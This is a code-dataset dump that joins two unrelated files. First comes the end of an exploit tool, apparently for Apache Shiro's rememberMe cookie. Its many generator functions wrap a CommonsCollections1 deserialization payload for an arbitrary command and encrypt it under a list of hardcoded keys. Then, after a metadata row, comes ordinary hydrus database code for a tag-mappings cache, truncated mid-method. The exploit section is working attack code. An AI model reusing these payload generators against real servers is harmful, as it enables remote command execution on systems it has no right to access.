raise Exception('jar file not found!')
popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections1', command], #popen
stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "U3ByaW5nQmxhZGUAAAAAAA==" #key
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
def generator8(self,command, fp):
if not os.path.exists(fp):
raise Exception('jar file not found!')
popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections1', command], #popen
stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "wGiHplamyXlVB11UXWol8g==" #key
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
def generator9(self,command, fp):
if not os.path.exists(fp):
raise Exception('jar file not found!')
popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections1', command], #popen
stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "6ZmI6I2j5Y+R5aSn5ZOlAA==" #key
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
#ๅ็็บฟ
#ๅ่กฅ็ผ็
def generator100(self,command, fp):
if not os.path.exists(fp):
raise Exception('jar file not found!')
popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections1', command], #popen
stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "fCq+/xW488hMTCD+cmJ3aQ==" #key
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
def generator111(self,command, fp):
if not os.path.exists(fp):
raise Exception('jar file not found!')
popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections1', command], #popen
stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "1QWLxg+NYmxraMoxAXu/Iw==" #key
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
def generator222(self,command, fp):
if not os.path.exists(fp):
raise Exception('jar file not found!')
popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections1', command], #popen
stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "ZUdsaGJuSmxibVI2ZHc9PQ==" #key
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
def generator333(self,command, fp):
if not os.path.exists(fp):
raise Exception('jar file not found!')
popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections1', command], #popen
stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "L7RioUULEFhRyxM7a2R/Yg==" #key
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
def generator444(self,command, fp):
if not os.path.exists(fp):
raise Exception('jar file not found!')
popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections1', command], #popen
stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "r0e3c16IdVkouZgk1TKVMg==" #key
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
def generator555(self,command, fp):
if not os.path.exists(fp):
raise Exception('jar file not found!')
popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections1', command], #popen
stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "ZWvohmPdUsAWT3=KpPqda" #key
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
def generator666(self,command, fp):
if not os.path.exists(fp):
raise Exception('jar file not found!')
popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections1', command], #popen
stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "5aaC5qKm5oqA5pyvAAAAAA==" #key
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
def generator777(self,command, fp):
if not os.path.exists(fp):
raise Exception('jar file not found!')
popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections1', command], #popen
stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "bWluZS1hc3NldC1rZXk6QQ==" #key
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
def generator888(self,command, fp):
if not os.path.exists(fp):
raise Exception('jar file not found!')
popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections1', command], #popen
stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "a2VlcE9uR29pbmdBbmRGaQ==" #key
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
def generator999(self,command, fp):
if not os.path.exists(fp):
raise Exception('jar file not found!')
popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections1', command], #popen
stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "WcfHGU25gNnTxTlmJMeSpw==" #key
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
def generator1111(self,command, fp):
if not os.path.exists(fp):
raise Exception('jar file not found!')
popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections1', command], #popen
stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "LEGEND-CAMPUS-CIPHERKEY==" #key
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv) #ๅkeyๅฝฑๅ็encryptor
file_body = pad(popen.stdout.read()) #ๅpopenๅฝฑๅ็file_body
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
def generator_001(self,command, fp):
if not os.path.exists(fp):
raise Exception('jar file not found!')
popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections1', command], #popen
stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "bWljcm9zAAAAAAAAAAAAAA==" #key
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv) #ๅkeyๅฝฑๅ็encryptor
file_body = pad(popen.stdout.read()) #ๅpopenๅฝฑๅ็file_body
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
def generator_002(self,command, fp):
if not os.path.exists(fp):
raise Exception('jar file not found!')
popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections1', command], #popen
stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "MTIzNDU2Nzg5MGFiY2RlZg==" #key
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv) #ๅkeyๅฝฑๅ็encryptor
file_body = pad(popen.stdout.read()) #ๅpopenๅฝฑๅ็file_body
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
def generator_003(self,command, fp):
if not os.path.exists(fp):
raise Exception('jar file not found!')
popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections1', command], #popen
stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "5AvVhmFLUs0KTA3Kprsdag==" #key
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv) #ๅkeyๅฝฑๅ็encryptor
file_body = pad(popen.stdout.read()) #ๅpopenๅฝฑๅ็file_body
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
| [
"sven@svenbeast.com"
] | sven@svenbeast.com |
e35702ff865d77d881bb1f8c662a0694bcae1d85 | 027bdfb0f5dd6e7fe86189324a2c7ebd3a1ebea9 | /hydrus/client/db/ClientDBMappingsCacheSpecificStorage.py | 83ba6be205cd310a23f5eb700d6bfbe24c4fb7c0 | [
"WTFPL"
] | permissive | pianomanx/hydrus | 5299a1bcc383760b7ed349e047467f6ac8fa6a43 | 368309645f85ecff832c0a968b3492bf582cdad5 | refs/heads/master | 2023-09-02T14:19:42.516186 | 2023-08-30T21:00:53 | 2023-08-30T21:00:53 | 90,190,997 | 0 | 0 | NOASSERTION | 2023-09-14T09:10:58 | 2017-05-03T20:33:50 | Python | UTF-8 | Python | false | false | 29,320 | py | import collections
import itertools
import sqlite3
import typing
from hydrus.core import HydrusConstants as HC
from hydrus.core import HydrusData
from hydrus.core import HydrusDBBase
from hydrus.core import HydrusLists
from hydrus.core import HydrusTime
from hydrus.client.db import ClientDBFilesStorage
from hydrus.client.db import ClientDBMaintenance
from hydrus.client.db import ClientDBMappingsCacheSpecificDisplay
from hydrus.client.db import ClientDBMappingsCounts
from hydrus.client.db import ClientDBMappingsCountsUpdate
from hydrus.client.db import ClientDBMappingsStorage
from hydrus.client.db import ClientDBModule
from hydrus.client.db import ClientDBServices
from hydrus.client.metadata import ClientTags
class FilteredHashesGenerator( object ):
def __init__( self, file_service_ids_to_valid_hash_ids ):
self._file_service_ids_to_valid_hash_ids = file_service_ids_to_valid_hash_ids
def GetHashes( self, file_service_id, hash_ids ):
return self._file_service_ids_to_valid_hash_ids[ file_service_id ].intersection( hash_ids )
def IterateHashes( self, hash_ids ):
for ( file_service_id, valid_hash_ids ) in self._file_service_ids_to_valid_hash_ids.items():
if len( valid_hash_ids ) == 0:
continue
filtered_hash_ids = valid_hash_ids.intersection( hash_ids )
if len( filtered_hash_ids ) == 0:
continue
yield ( file_service_id, filtered_hash_ids )
class FilteredMappingsGenerator( object ):
def __init__( self, file_service_ids_to_valid_hash_ids, mappings_ids ):
self._file_service_ids_to_valid_hash_ids = file_service_ids_to_valid_hash_ids
self._mappings_ids = mappings_ids
def IterateMappings( self, file_service_id ):
valid_hash_ids = self._file_service_ids_to_valid_hash_ids[ file_service_id ]
if len( valid_hash_ids ) > 0:
for ( tag_id, hash_ids ) in self._mappings_ids:
hash_ids = valid_hash_ids.intersection( hash_ids )
if len( hash_ids ) == 0:
continue
yield ( tag_id, hash_ids )
class ClientDBMappingsCacheSpecificStorage( ClientDBModule.ClientDBModule ):
CAN_REPOPULATE_ALL_MISSING_DATA = True
def __init__( self, cursor: sqlite3.Cursor, modules_services: ClientDBServices.ClientDBMasterServices, modules_db_maintenance: ClientDBMaintenance.ClientDBMaintenance, modules_mappings_counts: ClientDBMappingsCounts.ClientDBMappingsCounts, modules_mappings_counts_update: ClientDBMappingsCountsUpdate.ClientDBMappingsCountsUpdate, modules_files_storage: ClientDBFilesStorage.ClientDBFilesStorage, modules_mappings_cache_specific_display: ClientDBMappingsCacheSpecificDisplay.ClientDBMappingsCacheSpecificDisplay ):
self.modules_services = modules_services
self.modules_db_maintenance = modules_db_maintenance
self.modules_mappings_counts = modules_mappings_counts
self.modules_mappings_counts_update = modules_mappings_counts_update
self.modules_files_storage = modules_files_storage
self.modules_mappings_cache_specific_display = modules_mappings_cache_specific_display
self._missing_tag_service_pairs = set()
ClientDBModule.ClientDBModule.__init__( self, 'client specific display mappings cache', cursor )
def _GetServiceIndexGenerationDictSingle( self, file_service_id, tag_service_id ):
( cache_current_mappings_table_name, cache_deleted_mappings_table_name, cache_pending_mappings_table_name ) = ClientDBMappingsStorage.GenerateSpecificMappingsCacheTableNames( file_service_id, tag_service_id )
version = 486 if file_service_id == self.modules_services.combined_local_media_service_id else 400
index_generation_dict = {}
index_generation_dict[ cache_current_mappings_table_name ] = [
( [ 'tag_id', 'hash_id' ], True, version )
]
index_generation_dict[ cache_deleted_mappings_table_name ] = [
( [ 'tag_id', 'hash_id' ], True, version )
]
index_generation_dict[ cache_pending_mappings_table_name ] = [
( [ 'tag_id', 'hash_id' ], True, version )
]
return index_generation_dict
def _GetServiceIndexGenerationDict( self, service_id ) -> dict:
tag_service_id = service_id
index_dict = {}
file_service_ids = list( self.modules_services.GetServiceIds( HC.FILE_SERVICES_WITH_SPECIFIC_MAPPING_CACHES ) )
for file_service_id in file_service_ids:
single_index_dict = self._GetServiceIndexGenerationDictSingle( file_service_id, tag_service_id )
index_dict.update( single_index_dict )
return index_dict
def _GetServiceTableGenerationDictSingle( self, file_service_id, tag_service_id ):
table_dict = {}
( cache_current_mappings_table_name, cache_deleted_mappings_table_name, cache_pending_mappings_table_name ) = ClientDBMappingsStorage.GenerateSpecificMappingsCacheTableNames( file_service_id, tag_service_id )
version = 486 if file_service_id == self.modules_services.combined_local_media_service_id else 400
table_dict[ cache_current_mappings_table_name ] = ( 'CREATE TABLE IF NOT EXISTS {} ( hash_id INTEGER, tag_id INTEGER, PRIMARY KEY ( hash_id, tag_id ) ) WITHOUT ROWID;', version )
table_dict[ cache_deleted_mappings_table_name ] = ( 'CREATE TABLE IF NOT EXISTS {} ( hash_id INTEGER, tag_id INTEGER, PRIMARY KEY ( hash_id, tag_id ) ) WITHOUT ROWID;', version )
table_dict[ cache_pending_mappings_table_name ] = ( 'CREATE TABLE IF NOT EXISTS {} ( hash_id INTEGER, tag_id INTEGER, PRIMARY KEY ( hash_id, tag_id ) ) WITHOUT ROWID;', version )
return table_dict
def _GetServiceTableGenerationDict( self, service_id ) -> dict:
tag_service_id = service_id
table_dict = {}
file_service_ids = list( self.modules_services.GetServiceIds( HC.FILE_SERVICES_WITH_SPECIFIC_MAPPING_CACHES ) )
for file_service_id in file_service_ids:
single_table_dict = self._GetServiceTableGenerationDictSingle( file_service_id, tag_service_id )
table_dict.update( single_table_dict )
return table_dict
def _GetServiceIdsWeGenerateDynamicTablesFor( self ):
return self.modules_services.GetServiceIds( HC.REAL_TAG_SERVICES )
def _RepairRepopulateTables( self, table_names, cursor_transaction_wrapper: HydrusDBBase.DBCursorTransactionWrapper ):
file_service_ids = list( self.modules_services.GetServiceIds( HC.FILE_SERVICES_WITH_SPECIFIC_MAPPING_CACHES ) )
tag_service_ids = list( self.modules_services.GetServiceIds( HC.REAL_TAG_SERVICES ) )
for tag_service_id in tag_service_ids:
for file_service_id in file_service_ids:
table_dict_for_this = self._GetServiceTableGenerationDictSingle( file_service_id, tag_service_id )
table_names_for_this = set( table_dict_for_this.keys() )
if not table_names_for_this.isdisjoint( table_names ):
self._missing_tag_service_pairs.add( ( file_service_id, tag_service_id ) )
def AddFiles( self, file_service_id, tag_service_id, hash_ids, hash_ids_table_name ):
( cache_current_mappings_table_name, cache_deleted_mappings_table_name, cache_pending_mappings_table_name ) = ClientDBMappingsStorage.GenerateSpecificMappingsCacheTableNames( file_service_id, tag_service_id )
( current_mappings_table_name, deleted_mappings_table_name, pending_mappings_table_name, petitioned_mappings_table_name ) = ClientDBMappingsStorage.GenerateMappingsTableNames( tag_service_id )
# deleted don't have a/c counts to update, so we can do it all in one go here
self._Execute( 'INSERT OR IGNORE INTO {} ( hash_id, tag_id ) SELECT tag_id, hash_id FROM {} CROSS JOIN {} USING ( hash_id );'.format( cache_deleted_mappings_table_name, hash_ids_table_name, deleted_mappings_table_name ) )
# temp hashes to mappings
current_mapping_ids_raw = self._Execute( 'SELECT tag_id, hash_id FROM {} CROSS JOIN {} USING ( hash_id );'.format( hash_ids_table_name, current_mappings_table_name ) ).fetchall()
current_mapping_ids_dict = HydrusData.BuildKeyToSetDict( current_mapping_ids_raw )
# temp hashes to mappings
pending_mapping_ids_raw = self._Execute( 'SELECT tag_id, hash_id FROM {} CROSS JOIN {} USING ( hash_id );'.format( hash_ids_table_name, pending_mappings_table_name ) ).fetchall()
pending_mapping_ids_dict = HydrusData.BuildKeyToSetDict( pending_mapping_ids_raw )
all_ids_seen = set( current_mapping_ids_dict.keys() )
all_ids_seen.update( pending_mapping_ids_dict.keys() )
counts_cache_changes = []
for tag_id in all_ids_seen:
current_hash_ids = current_mapping_ids_dict[ tag_id ]
current_delta = len( current_hash_ids )
if current_delta > 0:
self._ExecuteMany( 'INSERT OR IGNORE INTO ' + cache_current_mappings_table_name + ' ( hash_id, tag_id ) VALUES ( ?, ? );', ( ( hash_id, tag_id ) for hash_id in current_hash_ids ) )
current_delta = self._GetRowCount()
#
pending_hash_ids = pending_mapping_ids_dict[ tag_id ]
pending_delta = len( pending_hash_ids )
if pending_delta > 0:
self._ExecuteMany( 'INSERT OR IGNORE INTO ' + cache_pending_mappings_table_name + ' ( hash_id, tag_id ) VALUES ( ?, ? );', ( ( hash_id, tag_id ) for hash_id in pending_hash_ids ) )
pending_delta = self._GetRowCount()
#
if current_delta > 0 or pending_delta > 0:
counts_cache_changes.append( ( tag_id, current_delta, pending_delta ) )
if len( counts_cache_changes ) > 0:
self.modules_mappings_counts_update.AddCounts( ClientTags.TAG_DISPLAY_STORAGE, file_service_id, tag_service_id, counts_cache_changes )
def AddMappings( self, tag_service_id, tag_id, hash_ids, filtered_hashes_generator: FilteredHashesGenerator ):
for ( file_service_id, filtered_hash_ids ) in filtered_hashes_generator.IterateHashes( hash_ids ):
( cache_current_mappings_table_name, cache_deleted_mappings_table_name, cache_pending_mappings_table_name ) = ClientDBMappingsStorage.GenerateSpecificMappingsCacheTableNames( file_service_id, tag_service_id )
# we have to interleave this into the iterator so that if two siblings with the same ideal are pend->currented at once, we remain logic consistent for soletag lookups!
self.modules_mappings_cache_specific_display.RescindPendingMappings( file_service_id, tag_service_id, tag_id, filtered_hash_ids )
self._ExecuteMany( 'DELETE FROM ' + cache_pending_mappings_table_name + ' WHERE hash_id = ? AND tag_id = ?;', ( ( hash_id, tag_id ) for hash_id in filtered_hash_ids ) )
num_pending_rescinded = self._GetRowCount()
#
self._ExecuteMany( 'INSERT OR IGNORE INTO ' + cache_current_mappings_table_name + ' ( hash_id, tag_id ) VALUES ( ?, ? );', ( ( hash_id, tag_id ) for hash_id in filtered_hash_ids ) )
num_current_inserted = self._GetRowCount()
#
self._ExecuteMany( 'DELETE FROM ' + cache_deleted_mappings_table_name + ' WHERE hash_id = ? AND tag_id = ?;', ( ( hash_id, tag_id ) for hash_id in filtered_hash_ids ) )
if num_current_inserted > 0:
counts_cache_changes = [ ( tag_id, num_current_inserted, 0 ) ]
self.modules_mappings_counts_update.AddCounts( ClientTags.TAG_DISPLAY_STORAGE, file_service_id, tag_service_id, counts_cache_changes )
if num_pending_rescinded > 0:
counts_cache_changes = [ ( tag_id, 0, num_pending_rescinded ) ]
self.modules_mappings_counts_update.ReduceCounts( ClientTags.TAG_DISPLAY_STORAGE, file_service_id, tag_service_id, counts_cache_changes )
self.modules_mappings_cache_specific_display.AddMappings( file_service_id, tag_service_id, tag_id, filtered_hash_ids )
def Clear( self, file_service_id, tag_service_id, keep_pending = False ):
( cache_current_mappings_table_name, cache_deleted_mappings_table_name, cache_pending_mappings_table_name ) = ClientDBMappingsStorage.GenerateSpecificMappingsCacheTableNames( file_service_id, tag_service_id )
self._Execute( 'DELETE FROM {};'.format( cache_current_mappings_table_name ) )
self._Execute( 'DELETE FROM {};'.format( cache_deleted_mappings_table_name ) )
if not keep_pending:
self._Execute( 'DELETE FROM {};'.format( cache_pending_mappings_table_name ) )
self.modules_mappings_counts.ClearCounts( ClientTags.TAG_DISPLAY_STORAGE, file_service_id, tag_service_id, keep_pending = keep_pending )
self.modules_mappings_cache_specific_display.Clear( file_service_id, tag_service_id, keep_pending = keep_pending )
def CreateTables( self, file_service_id, tag_service_id ):
table_generation_dict = self._GetServiceTableGenerationDictSingle( file_service_id, tag_service_id )
for ( table_name, ( create_query_without_name, version_added ) ) in table_generation_dict.items():
self._CreateTable( create_query_without_name, table_name )
self.modules_mappings_counts.CreateTables( ClientTags.TAG_DISPLAY_STORAGE, file_service_id, tag_service_id )
def Drop( self, file_service_id, tag_service_id ):
( cache_current_mappings_table_name, cache_deleted_mappings_table_name, cache_pending_mappings_table_name ) = ClientDBMappingsStorage.GenerateSpecificMappingsCacheTableNames( file_service_id, tag_service_id )
self.modules_db_maintenance.DeferredDropTable( cache_current_mappings_table_name )
self.modules_db_maintenance.DeferredDropTable( cache_deleted_mappings_table_name )
self.modules_db_maintenance.DeferredDropTable( cache_pending_mappings_table_name )
self.modules_mappings_counts.DropTables( ClientTags.TAG_DISPLAY_STORAGE, file_service_id, tag_service_id )
self.modules_mappings_cache_specific_display.Drop( file_service_id, tag_service_id )
    def DeleteFiles( self, file_service_id, tag_service_id, hash_ids, hash_id_table_name ):
        """Remove the given hash_ids from this pair's cache tables and reduce per-tag counts.
        
        hash_id_table_name is a temp integer table holding the same hash_ids, used for fast joins.
        """
        self.modules_mappings_cache_specific_display.DeleteFiles( file_service_id, tag_service_id, hash_ids, hash_id_table_name )
        ( cache_current_mappings_table_name, cache_deleted_mappings_table_name, cache_pending_mappings_table_name ) = ClientDBMappingsStorage.GenerateSpecificMappingsCacheTableNames( file_service_id, tag_service_id )
        # temp hashes to mappings
        deleted_mapping_ids_raw = self._Execute( 'SELECT tag_id, hash_id FROM {} CROSS JOIN {} USING ( hash_id );'.format( hash_id_table_name, cache_deleted_mappings_table_name ) ).fetchall()
        if len( deleted_mapping_ids_raw ) > 0:
            # deleted rows are not represented in the counts, so they can simply be removed
            self._ExecuteMany( 'DELETE FROM {} WHERE tag_id = ? AND hash_id = ?;'.format( cache_deleted_mappings_table_name ), deleted_mapping_ids_raw )
        # temp hashes to mappings
        current_mapping_ids_raw = self._Execute( 'SELECT tag_id, hash_id FROM {} CROSS JOIN {} USING ( hash_id );'.format( hash_id_table_name, cache_current_mappings_table_name ) ).fetchall()
        current_mapping_ids_dict = HydrusData.BuildKeyToSetDict( current_mapping_ids_raw )
        # temp hashes to mappings
        pending_mapping_ids_raw = self._Execute( 'SELECT tag_id, hash_id FROM {} CROSS JOIN {} USING ( hash_id );'.format( hash_id_table_name, cache_pending_mappings_table_name ) ).fetchall()
        pending_mapping_ids_dict = HydrusData.BuildKeyToSetDict( pending_mapping_ids_raw )
        # tally, per tag, how many current/pending rows are about to disappear
        all_ids_seen = set( current_mapping_ids_dict.keys() )
        all_ids_seen.update( pending_mapping_ids_dict.keys() )
        counts_cache_changes = []
        for tag_id in all_ids_seen:
            # assumes BuildKeyToSetDict returns a defaultdict-like mapping (missing tags -> empty set) -- TODO confirm
            current_hash_ids = current_mapping_ids_dict[ tag_id ]
            num_current = len( current_hash_ids )
            #
            pending_hash_ids = pending_mapping_ids_dict[ tag_id ]
            num_pending = len( pending_hash_ids )
            counts_cache_changes.append( ( tag_id, num_current, num_pending ) )
        self._ExecuteMany( 'DELETE FROM ' + cache_current_mappings_table_name + ' WHERE hash_id = ?;', ( ( hash_id, ) for hash_id in hash_ids ) )
        self._ExecuteMany( 'DELETE FROM ' + cache_pending_mappings_table_name + ' WHERE hash_id = ?;', ( ( hash_id, ) for hash_id in hash_ids ) )
        if len( counts_cache_changes ) > 0:
            self.modules_mappings_counts_update.ReduceCounts( ClientTags.TAG_DISPLAY_STORAGE, file_service_id, tag_service_id, counts_cache_changes )
    def DeleteMappings( self, tag_service_id, tag_id, hash_ids, filtered_hashes_generator: FilteredHashesGenerator ):
        """For each file service holding the hashes, move ( tag_id, hash_id ) rows from current to deleted and reduce current counts."""
        for ( file_service_id, filtered_hash_ids ) in filtered_hashes_generator.IterateHashes( hash_ids ):
            ( cache_current_mappings_table_name, cache_deleted_mappings_table_name, cache_pending_mappings_table_name ) = ClientDBMappingsStorage.GenerateSpecificMappingsCacheTableNames( file_service_id, tag_service_id )
            self.modules_mappings_cache_specific_display.DeleteMappings( file_service_id, tag_service_id, tag_id, filtered_hash_ids )
            self._ExecuteMany( 'DELETE FROM ' + cache_current_mappings_table_name + ' WHERE hash_id = ? AND tag_id = ?;', ( ( hash_id, tag_id ) for hash_id in filtered_hash_ids ) )
            # only rows that actually existed in 'current' reduce the count
            num_deleted = self._GetRowCount()
            #
            self._ExecuteMany( 'INSERT OR IGNORE INTO ' + cache_deleted_mappings_table_name + ' ( hash_id, tag_id ) VALUES ( ?, ? );', ( ( hash_id, tag_id ) for hash_id in filtered_hash_ids ) )
            if num_deleted > 0:
                counts_cache_changes = [ ( tag_id, num_deleted, 0 ) ]
                self.modules_mappings_counts_update.ReduceCounts( ClientTags.TAG_DISPLAY_STORAGE, file_service_id, tag_service_id, counts_cache_changes )
    def Generate( self, file_service_id, tag_service_id ):
        """Build this pair's cache from scratch: create tables, repopulate from the service's current files in blocks, then add indices and regenerate the display cache."""
        self.CreateTables( file_service_id, tag_service_id )
        #
        hash_ids = self.modules_files_storage.GetCurrentHashIdsList( file_service_id )
        BLOCK_SIZE = 10000
        # populate in fixed-size blocks via a temp integer table per block
        for ( i, block_of_hash_ids ) in enumerate( HydrusLists.SplitListIntoChunks( hash_ids, BLOCK_SIZE ) ):
            with self._MakeTemporaryIntegerTable( block_of_hash_ids, 'hash_id' ) as temp_hash_id_table_name:
                self.AddFiles( file_service_id, tag_service_id, block_of_hash_ids, temp_hash_id_table_name )
        # indices are created only after the bulk insert
        index_generation_dict = self._GetServiceIndexGenerationDictSingle( file_service_id, tag_service_id )
        for ( table_name, columns, unique, version_added ) in self._FlattenIndexGenerationDict( index_generation_dict ):
            self._CreateIndex( table_name, columns, unique = unique )
        self.modules_db_maintenance.TouchAnalyzeNewTables()
        self.modules_mappings_cache_specific_display.Generate( file_service_id, tag_service_id, populate_from_storage = True )
    def GetFilteredHashesGenerator( self, file_service_ids, tag_service_id, hash_ids ) -> FilteredHashesGenerator:
        """Map each file service id to the subset of hash_ids currently in that service and wrap the result in a FilteredHashesGenerator."""
        file_service_ids_to_valid_hash_ids = collections.defaultdict( set )
        with self._MakeTemporaryIntegerTable( hash_ids, 'hash_id' ) as temp_table_name:
            for file_service_id in file_service_ids:
                # join the temp hash table against the file domain's 'current' rows
                table_join = self.modules_files_storage.GetTableJoinLimitedByFileDomain( file_service_id, temp_table_name, HC.CONTENT_STATUS_CURRENT )
                valid_hash_ids = self._STS( self._Execute( 'SELECT hash_id FROM {};'.format( table_join ) ) )
                file_service_ids_to_valid_hash_ids[ file_service_id ] = valid_hash_ids
        return FilteredHashesGenerator( file_service_ids_to_valid_hash_ids )
    def GetFilteredMappingsGenerator( self, file_service_ids, tag_service_id, mappings_ids ) -> FilteredMappingsGenerator:
        """Filter every hash referenced by the ( tag_id, hash_ids ) mapping pairs down to those current in each file service, wrapped in a FilteredMappingsGenerator."""
        # flatten all hash ids mentioned across the mapping pairs
        all_hash_ids = set( itertools.chain.from_iterable( ( hash_ids for ( tag_id, hash_ids ) in mappings_ids ) ) )
        file_service_ids_to_valid_hash_ids = collections.defaultdict( set )
        with self._MakeTemporaryIntegerTable( all_hash_ids, 'hash_id' ) as temp_table_name:
            for file_service_id in file_service_ids:
                table_join = self.modules_files_storage.GetTableJoinLimitedByFileDomain( file_service_id, temp_table_name, HC.CONTENT_STATUS_CURRENT )
                valid_hash_ids = self._STS( self._Execute( 'SELECT hash_id FROM {};'.format( table_join ) ) )
                file_service_ids_to_valid_hash_ids[ file_service_id ] = valid_hash_ids
        return FilteredMappingsGenerator( file_service_ids_to_valid_hash_ids, mappings_ids )
    def GetMissingServicePairs( self ):
        """Return the recorded missing ( file, tag ) service pairs."""
